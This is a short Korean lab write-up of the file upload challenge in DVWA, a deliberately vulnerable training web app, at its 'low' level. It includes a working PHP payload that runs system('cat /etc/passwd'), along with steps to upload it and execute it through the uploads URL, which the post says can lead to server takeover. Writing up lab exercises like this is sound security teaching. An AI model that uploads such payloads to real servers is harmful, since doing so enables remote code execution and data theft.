DVWA File Upload - low
[그림 1]
Summary
[그림1] 는 File upload 공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다.
Description
[그림 1] 은 확장자 검사 등 보호대책이 적용되어 있지 않아 PHP 파일업로드가 가능합니다.
../../hackable/uploads/file upload.php succesfully uploaded!
Steps to reproduce
1. 다음과 같은 PHP 파일을 만듭니다.
<?
system('cat /etc/passwd');
?>
2. 파일 선택을 누르고 PHP 파일을 업로드합니다.
3. 업로드한 주소인 http://localhost/hackable/uploads/file upload.php 주소로 이동합니다.
Impact
공격자는 PHP 파일업로드를 통한 서버 장악이 가능합니다. 이는 원격코드실행취약점으로도 이뤄질수있습니다.
댓글
댓글 쓰기